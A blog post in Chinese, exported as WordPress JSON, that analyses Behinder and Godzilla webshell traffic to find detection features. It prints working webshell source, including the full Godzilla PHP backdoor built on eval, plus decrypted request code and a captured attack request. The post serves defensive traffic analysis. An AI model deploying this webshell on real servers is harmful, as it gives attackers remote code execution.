{"id":251,"date":"2022-04-23T17:44:08","date_gmt":"2022-04-23T09:44:08","guid":{"rendered":"http:\/\/danielw.top\/?p=251"},"modified":"2023-09-22T14:00:28","modified_gmt":"2023-09-22T06:00:28","slug":"webshell%e5%b7%a5%e5%85%b7%e6%b5%81%e9%87%8f%e5%88%86%e6%9e%90","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=251","title":{"rendered":"webshell\u5de5\u5177\u6d41\u91cf\u5206\u6790"},"content":{"rendered":"

\u51b0\u874e\uff08Behinder\uff09<\/h2>\n

\u51b0\u874e\u5229\u7528\u4e86\u670d\u52a1\u5668\u7aef\u7684\u811a\u672c\u8bed\u8a00\u52a0\u5bc6\u529f\u80fd\uff0c\u901a\u8baf\u7684\u8fc7\u7a0b\u4e2d\uff0c\u6d88\u606f\u4f53\u5185\u5bb9\u91c7\u7528 AES \u52a0\u5bc6\uff0c\u57fa\u4e8e\u7279\u5f81\u503c\u68c0\u6d4b\u7684\u5b89\u5168\u4ea7\u54c1\u65e0\u6cd5\u67e5\u51fa<\/p>\n

AES\u52a0\u5bc6\uff1a\u9ad8\u7ea7\u52a0\u5bc6\u6807\u51c6 (AES,Advanced Encryption Standard) \u4e3a\u6700\u5e38\u89c1\u7684\u5bf9\u79f0\u52a0\u5bc6\u7b97\u6cd5(\u5fae\u4fe1\u5c0f\u7a0b\u5e8f\u52a0\u5bc6\u4f20\u8f93\u5c31\u662f\u7528\u8fd9\u4e2a\u52a0\u5bc6\u7b97\u6cd5\u7684)\uff0c\u5bf9\u79f0\u52a0\u5bc6\u7b97\u6cd5\u4e5f\u5c31\u662f\u52a0\u5bc6\u548c\u89e3\u5bc6\u7528\u76f8\u540c\u7684\u5bc6\u94a5\uff0c\u5177\u4f53\u7684\u52a0\u5bc6\u6d41\u7a0b\u5982\u4e0b\u56fe<\/p>\n

\"\u52a0\u5bc6\u6d41\u7a0b\u56fe\"<\/p>\n

\u5171\u6709\u4e24\u6b21\u8bf7\u6c42<\/p>\n

\u7b2c\u4e00\u6b21\u8bf7\u6c42<\/strong><\/p>\n

\u7b2c\u4e00\u6b21\u8bf7\u6c42\u4e3a\u5224\u65ad\u662f\u5426\u53ef\u4ee5\u5efa\u7acb\u8fde\u63a5\uff0c\u6bd4\u51b0\u874e2\u5c11\u4e86\u4fe9\u6b21 get \u83b7\u53d6\u51b0\u874e\u52a8\u6001\u5bc6\u94a5\u7684\u884c\u4e3a<\/p>\n

\u5bf9\u8bf7\u6c42\u6570\u636e\u8fdb\u884cAES\u89e3\u5bc6<\/p>\n

\"image-20220421161140041\"<\/p>\n

\u518d\u8fdb\u884cbase64\u89e3\u5bc6\uff0c\u83b7\u5f97\u89e3\u5bc6\u540e\u7684\u51b0\u874e\u8bf7\u6c42\u4e2d\u7684PHP\u4ee3\u7801<\/p>\n

@error_reporting(0);\nfunction main($content)\n{\n    $result = array();\n    $result["status"] = base64_encode("success");\n    $result["msg"] = base64_encode($content);\n    $key = $_SESSION['k'];\n    echo encrypt(json_encode($result),$key);\n}\n\nfunction encrypt($data,$key)\n{\n    if(!extension_loaded('openssl'))\n        {\n            for($i=0;$i<strlen($data);$i++) {\n                 $data[$i] = $data[$i]^$key[$i+1&15]; \n                }\n            return $data;\n        }\n    else\n        {\n            return openssl_encrypt($data, "AES128", $key);\n        }\n}$content="bmZOS1NVNVEzdWE5TWp3VFZ5T.............................";$content=base64_decode($content);\nmain($content);<\/code><\/pre>\n
content<\/code>\u8fd9\u4e2a\u53d8\u91cf\u540d\u79f0\u548c\u91cc\u9762\u7684\u5185\u5bb9\u4e3a\u968f\u673a\u751f\u6210\u7684\uff0c\u76ee\u7684\u662f\u4e3a\u4e86\u7ed5\u8fc7Content-Length<\/code><\/p>\n
\u5c06\u7b2c\u4e00\u6b21\u54cd\u5e94\u5934\u4e2d\u7684\u6570\u636e\u8fdb\u884c aes -> base64 \u89e3\u5bc6\u4e4b\u540e<\/p>\n
{"status":"success","msg":"anozNGkxcTZ5Mmd2dFUybEMxREpwR3........."}<\/code><\/pre>\n
message \u662f\u4e00\u6bb5\u8d85\u6781\u957f\u7684\u5b57\u7b26\u4e32\uff0c\u5206\u6790\u51b0\u874e\u8bf7\u6c42\u4e2d\u7684 PHP \u4ee3\u7801\uff0c\u53d1\u73b0\u4ed6\u5c31\u662f content \u7ecf\u8fc7 base64 -> aes \u52a0\u5bc6\u540e\u751f\u6210\u7684\uff0c\u4f5c\u7528\u548c\u8bf7\u6c42\u4e2d\u7684 content \u4e00\u81f4\u90fd\u662f\u7ed5\u8fc7 $Content-Length<\/code><\/p>\n
{"status":"success","msg":<\/code> \u8fd9\u4e2a\u8fd4\u56de\u6570\u636e\u7279\u5f81\u5df2\u7ecf\u5728\u51b0\u874e 2.0 \u4e2d\u5df2\u7ecf\u88ab\u52a0\u5165\u4e86Waf\u7684\u68c0\u6d4b\u89c4\u5219\u5f53\u4e2d\uff0c\u6240\u4ee5\u5728\u51b0\u874e 3.0 \u5f53\u4e2d\u7528\u8d85\u5927\u6570\u636e\u586b\u5145\u7684\u65b9\u5f0f\u7ed5\u8fc7<\/p>\n
\u601d\u8003\u4e00\u4e2a\u95ee\u9898<\/strong>\uff0c\u51b0\u874e 3.0 C\/S \u4e4b\u95f4\u5e76\u6ca1\u6709\u4f20\u8f93\u5bc6\u7801\uff0c\u90a3\u4e48\u51b0\u874e\u662f\u5982\u4f55\u5224\u65ad\u5bc6\u7801\u65f6\u5019\u6b63\u786e\u7684\uff1f<\/p>\n
\u5176\u5b9e\u8fd9\u4e2a\u95ee\u9898\uff0c\u5728\u5206\u6790\u6d41\u91cf\u65f6\u5df2\u7ecf\u5f88\u660e\u786e\u4e86\uff0c\u9996\u5148\u51b0\u874e\u91c7\u7528\u7684\u662f AES \u5bf9\u79f0\u5bc6\u94a5\u52a0\u5bc6\uff0c\u4f7f\u7528\u5bc6\u94a5 K \u52a0\u5bc6\u7684\u6570\u636e\u5fc5\u987b\u4f7f\u7528\u5bc6\u94a5 K \u89e3\u5bc6\uff0c\u800c\u51b0\u874e 3.0 webshell \u4e2d\u5df2\u7ecf\u56fa\u5b9a\u4e86\u8fd9\u4e2a\u5bc6\u94a5 K \u5373\u8fde\u63a5\u5bc6\u7801 MD5 \u503c\u7684\u524d16\u4f4d<\/p>\n
\u4ee5\u9ed8\u8ba4\u8fde\u63a5\u5bc6\u7801 rebeyond \u4e3a\u4f8b\uff0c\u6574\u4e2a\u5bc6\u7801\u9a8c\u8bc1\u6d41\u7a0b\u5982\u4e0b\uff1a<\/p>\n
    \n
  1. \n
    \u5ba2\u6237\u7aef\uff08\u9ed1\u5ba2\uff09\u4f7f\u7528\u51b0\u874e\u8fde\u63a5\u8f93\u5165\u5bc6\u7801 rebeyond \uff0c\u51b0\u874e\u5ba2\u6237\u7aef\u5bf9\u5bc6\u7801\u8fdb\u884c MD5 \u52a0\u5bc6\uff0c\u5bc6\u94a5\u4e3a\u52a0\u5bc6\u540e\u503c\u7684\u524d 16 \u4f4d\uff0c\u8fde\u63a5\u6570\u636e\u4f7f\u7528\u5176\u8fdb\u884c AES \u52a0\u5bc6<\/p>\n
    \"image-20211222212734710\"<\/p>\n<\/li>\n
  2. \n
    \u8fd9\u4e2a\u5bc6\u94a5\u5373 MD5 \u503c\u524d 16 \u4f4d\u5df2\u7ecf\u5728\u670d\u52a1\u7aef\u5199\u6b7b\u4e86\u5e76\u52a0\u5165 session\uff0c\u670d\u52a1\u7aef\u76f4\u63a5\u4ece session \u4e2d\u53bb\u9664 K \u503c\u8fdb\u884c AES\u89e3\u5bc6\uff0c\u5b8c\u6210\u6574\u4e2a\u901a\u4fe1\u6d41\u7a0b<\/p>\n
       $key = $_SESSION['k'];\n   echo encrypt(json_encode($result),$key);\n}<\/code><\/pre>\n<\/li>\n<\/ol>\n
    \u54e5\u65af\u62c9\uff08Godzilla\uff09<\/h2>\n
    \u7531\u4e8e\u54e5\u65af\u62c9\u5728\u5904\u7406 jsp \u548c php \u65f6\u52a0\u5bc6\u65b9\u5f0f\u5b58\u5728\u5dee\u5f02\uff0c\u672c\u6587\u5c06\u4ece php \u7248\u7684 shell \u5c55\u5f00\uff0c\u5bf9\u5176\u8fd0\u884c\u539f\u7406\u518d\u505a\u4e00\u4e0b\u603b\u7ed3\u548c\u9610\u8ff0\u3002\u9996\u5148\uff0c\u751f\u6210\u4e00\u4e2a php \u9759\u6001 webshell\uff0c\u52a0\u5bc6\u5668\u9009\u62e9 PHP_XOR_BASE64<\/code><\/p>\n
    HTTP\u8bf7\u6c42\u5934\u7279\u5f81<\/h3>\n
    User-Agent<\/h4>\n
    \u54e5\u65af\u62c9\u5ba2\u6237\u7aef\u4f7f\u7528 JAVA \u8bed\u8a00\u7f16\u5199\uff0c\u5728\u9ed8\u8ba4\u7684\u60c5\u51b5\u4e0b\uff0c\u5982\u679c\u4e0d\u4fee\u6539 User-Agent\uff0cUser-Agent \u4f1a\u7c7b\u4f3c\u4e8e Java\/11.0.7\uff08\u5177\u4f53\u4ec0\u4e48\u7248\u672c\u53d6\u51b3\u4e8e JDK \u73af\u5883\u7248\u672c\uff09\u3002\u4f46\u662f\u54e5\u65af\u62c9\u652f\u6301\u81ea\u5b9a\u4e49 HTTP \u5934\u90e8\uff0c\u8fd9\u4e2a\u9ed8\u8ba4\u7279\u5f81\u662f\u53ef\u4ee5\u5f88\u5bb9\u6613\u53bb\u9664\u7684<\/p>\n
    Accept<\/h4>\n
    Accept<\/code> \u5934\u4e3a text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8<\/code> \u5bf9\u8fd9\u4e2a\u9ed8\u8ba4\u7279\u5f81\u5e94\u8be5\u5f88\u719f\u6089\u4e86\uff0c\u4e4b\u524d\u51b0\u874e\u4e5f\u51fa\u73b0\u8fc7\u540c\u6837\u7684 Accept\u3002\u4e3a\u4ec0\u4e48\u4f1a\u8fd9\u4e48\u5de7\u5408\u51fa\u73b0\u4e24\u4e2a\u5de5\u5177\u90fd\u4f1a\u51fa\u73b0\u8fd9\u4e2a\u7279\u5f81\u5462\uff0c\u5176\u5b9e\u8fd9\u4e2a\u4e5f\u662f JDK  \u5f15\u5165\u7684\u4e00\u4e2a\u7279\u5f81\uff0c\u5e76\u4e0d\u662f\u4f5c\u8005\u81ea\u5b9a\u4e49\u7684 Accept\u3002\u540c\u6837\u7684\u8fd9\u4e2a\u9ed8\u8ba4\u7279\u5f81\u4e5f\u53ef\u4ee5\u901a\u8fc7\u81ea\u5b9a\u4e49\u5934\u90e8\u53bb\u9664\uff0c\u53ea\u80fd\u4f5c\u4e3a\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u7684\u8f85\u52a9\u68c0\u6d4b\u7279\u5f81<\/p>\n
    \u8bf7\u6c42\u4f53\u7279\u5f81<\/h3>\n
    PHP_XOR_BASE64<\/h4>\n
    \"image-20220423163418629\"<\/p>\n
    \u4ee5\u9ed8\u8ba4 shell \u7684\u5bc6\u7801\u548c\u5bc6\u94a5\u4e3a\u4f8b\uff0c\u751f\u6210\u7684\u6587\u4ef6\u5982\u4e0b\uff1a<\/p>\n
    <?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){ \/\/\u8fdb\u884c\u5f02\u6216\u52a0\u89e3\u5bc6\u7684\u51fd\u6570\n    for($i=0;$i<strlen($D);$i++) {\n        $c = $K[$i+1&15];\n        $D[$i] = $D[$i]^$c;\n    }\n    return $D;\n}\n$pass='pass';\n$payloadName='payload';\n$key='3c6e0b8a9c15224a';\nif (isset($_POST[$pass])){ \/\/\u5bf9\u4e0a\u4f20\u4ee3\u7801\u505a\u6267\u884c\u5e76\u5f97\u5230\u7ed3\u679c\n    $data=encode(base64_decode($_POST[$pass]),$key);\n    if (isset($_SESSION[$payloadName])){\n        $payload=encode($_SESSION[$payloadName],$key);\n        if (strpos($payload,"getBasicsInfo")===false){\n            $payload=encode($payload,$key);\n        }\n        eval($payload);\n        echo substr(md5($pass.$key),0,16);\n        echo base64_encode(encode(@run($data),$key));\n        echo substr(md5($pass.$key),16);\n    }else{\n        if (strpos($data,"getBasicsInfo")!==false){\n            $_SESSION[$payloadName]=encode($data,$key);\n        }\n    }\n}<\/code><\/pre>\n
    \u539f\u59cb\u4ee3\u7801->base64\u7f16\u7801->\u5f02\u6216\u52a0\u5bc6<\/p>\n
    \u6d41\u91cf\u5206\u6790<\/h4>\n
    \u9996\u6b21\u8fde\u63a5\u65f6\u4f1a\u6709\u4e09\u4e2a\u8fde\u7eed\u7684\u8bf7\u6c42<\/p>\n
    \"image-20220423164218835\"<\/p>\n
    \u7b2c\u4e00\u4e2a\u6570\u636e\u5305<\/strong><\/p>\n
    POST \/hackable\/uploads\/godzilla.php HTTP\/1.1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\/20100101 Firefox\/84.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nHost: 127.0.0.1:8081\nContent-type: application\/x-www-form-urlencoded\nContent-Length: 52541\nConnection: close\n\npass=R0YEQgNVBE0GQ0YPU0YTUhoeTAtv............URVEaQgBDWTVrRG47<\/code><\/pre>\n
    \u6839\u636e\u52a0\u5bc6\u4ee3\u7801\u7684\u5206\u6790\uff0c\u5bf9pass\u8fdb\u884c\u89e3\u5bc6\u540e\u4e3a\u5404\u79cd\u529f\u80fd\u7684\u811a\u672c<\/p>\n
    \"image-20220423172534851\"<\/p>\n
    \u53ef\u4ee5\u53d1\u73b0\u8be5\u6570\u636e\u5305\u5e76\u6ca1\u6709\u56de\u5305\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u6d41\u91cf\u8bc6\u522b\u7684\u5176\u4e2d\u4e00\u4e2a\u91cd\u8981\u7279\u5f81<\/p>\n
    \u7b2c\u4e8c\u4e2a\u6570\u636e\u5305<\/strong><\/p>\n
    \"image-20220423172841374\"<\/p>\n
    \u6839\u636e\u4ee3\u7801\u5206\u6790\u5bf9\u4f1a\u5305\u7684\u5b57\u7b26\u4e32\u8fdb\u884c\u89e3\u5bc6\uff08\u5206\u6790\u8fc7\u7a0b\u6bd4\u8f83\u590d\u6742\uff0c\u656c\u8bf7\u671f\u5f85\uff09\u5f97\u5230OK<\/p>\n
    \u8bf4\u660e\u8be5\u8bf7\u6c42\u4e00\u6761\u6d4b\u8bd5\u8bf7\u6c42\uff0c\u8bc1\u660eshell\u8fde\u63a5\u6210\u529f<\/p>\n
    \u7b2c\u4e09\u4e2a\u6570\u636e\u5305<\/strong><\/p>\n
    \u8be5\u8bf7\u6c42\u7684\u4f5c\u7528\u662f\u83b7\u53d6\u76ee\u6807\u7684\u73af\u5883\u4fe1\u606f\uff1a<\/p>\n
    \"image-20220423173837035\"<\/p>\n
    \u89e3\u5bc6\u5f97\u5230\u539f\u59cb\u4ee3\u7801 methodName=Z2V0QmFzaWNzSW5mbw==<\/code>\uff0c\u5373 methodName=getBasicsInfo<\/code>\u3002\u6b64\u64cd\u4f5c\u8c03\u7528 payload \u4e2d\u7684 getBasicsInfo \u65b9\u6cd5\u83b7\u53d6\u76ee\u6807\u73af\u5883\u4fe1\u606f\u5411\u5ba2\u6237\u7aef\u8fd4\u56de\u3002\u663e\u7136\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u53c8\u662f\u4e00\u4e2a\u56fa\u5b9a\u7279\u5f81<\/p>\n
    \u81f3\u6b64\uff0c\u6210\u529f\u6316\u6398\u5230\u54e5\u65af\u62c9\u5ba2\u6237\u7aef\u4e0e shell \u5efa\u8fde\u521d\u671f\u7684\u4e09\u4e2a\u56fa\u5b9a\u884c\u4e3a\u7279\u5f81\uff0c\u4e14\u987a\u5e8f\u51fa\u73b0\u5728\u540c\u4e00\u4e2a TCP \u8fde\u63a5\u4e2d\u3002\u53ef\u4ee5\u603b\u7ed3\u4e3a\uff1a<\/p>\n
      \n
    • \u53d1\u9001\u4e00\u6bb5\u56fa\u5b9a\u4ee3\u7801\uff08payload\uff09\uff0chttp \u54cd\u5e94\u4e3a\u7a7a<\/li>\n
    • \u53d1\u9001\u4e00\u6bb5\u56fa\u5b9a\u4ee3\u7801\uff08test\uff09\uff0c\u6267\u884c\u7ed3\u679c\u4e3a\u56fa\u5b9a\u5185\u5bb9<\/li>\n
    • \u53d1\u9001\u4e00\u6bb5\u56fa\u5b9a\u4ee3\u7801\uff08getBacisInfo\uff09<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
      \u51b0\u874e\uff08Behinder\uff09 \u51b0\u874e\u5229\u7528\u4e86\u670d\u52a1\u5668\u7aef\u7684\u811a\u672c\u8bed\u8a00\u52a0\u5bc6\u529f\u80fd\uff0c\u901a\u8baf\u7684\u8fc7\u7a0b\u4e2d\uff0c\u6d88\u606f\u4f53\u5185\u5bb9\u91c7\u7528 AES \u52a0\u5bc6\uff0c\u57fa\u4e8e\u7279\u5f81\u503c\u68c0\u6d4b\u7684\u5b89\u5168\u4ea7 …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":["post-251","post","type-post","status-publish","format-standard","hentry","category-19"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=251"}],"version-history":[{"count":1,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/251\/revisions"}],"predecessor-version":[{"id":252,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/251\/revisions\/252"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=251"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}